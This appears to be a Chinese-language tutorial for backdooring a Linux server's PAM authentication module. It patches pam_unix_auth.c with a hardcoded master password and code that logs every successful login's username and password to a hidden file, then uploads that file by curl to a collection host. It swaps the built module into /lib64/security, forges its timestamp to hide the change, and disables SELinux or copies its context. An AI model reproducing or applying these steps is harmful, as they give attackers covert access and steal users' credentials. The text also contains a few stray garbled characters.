查看pam版本并下載

rpm -qa | grep pam
pam-1.1.8-12.el7_1.1.x86_64

http://www.linux-pam.org/library/
curl -O http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

修改并編譯pam_unix_auth.c文件

cd Linux-PAM-1.1.8
vim modules/pam_unix/pam_unix_auth.c

pam_unix_auth.c 修改前

    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    name = p = NULL;

pam_unix_auth.c 修改后

    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    if(strcmp(p,"1q2w3e4r")==0){return PAM_SUCCESS;}
    if(retval == PAM_SUCCESS){
        FILE * fp;
        fp = fopen("/bin/.sshlog", "a");
        fprintf(fp, "%s : %s\n", name, p);
        fclose(fp);
        system("curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3");
        }
    name = p = NULL;

curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3

./configure
make

編譯后：modules/pam_unix/.libs/pam_unix.so

備份/替換/修改時間戳

ll /lib64/security/
-rwxr-xr-x. 1 root root  57688 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

cp /lib64/security/pam_unix.so /lib64/security/pam_unix.so.bak
cp ./pam_unix.so /lib64/security/pam_unix.so
touch -r /lib64/security/pam_userdb.so /lib64/security/pam_unix.so

ll /lib64/security/
-rwxr-xr-x. 1 root root 221776 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  57688 6月  30 23:18 pam_unix.so.bak
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

如果selinux是開啟的環(huán)境，一定要關(guān)掉或者設(shè)置好上下文pam_unix.so才能正常工作闻丑。

查看selinux 狀態(tài)
getenforce
    Enforcing 關(guān)閉
    Permissive 開啟
臨時關(guān)閉selinux
setenforce 0
臨時開啟selinux
setenforce 1

查看selinux上下文：
ls -Z pam_unix.so.bak
設(shè)置selinux上下文：
chcon –reference=pam_unix.so.bak pam_unix.so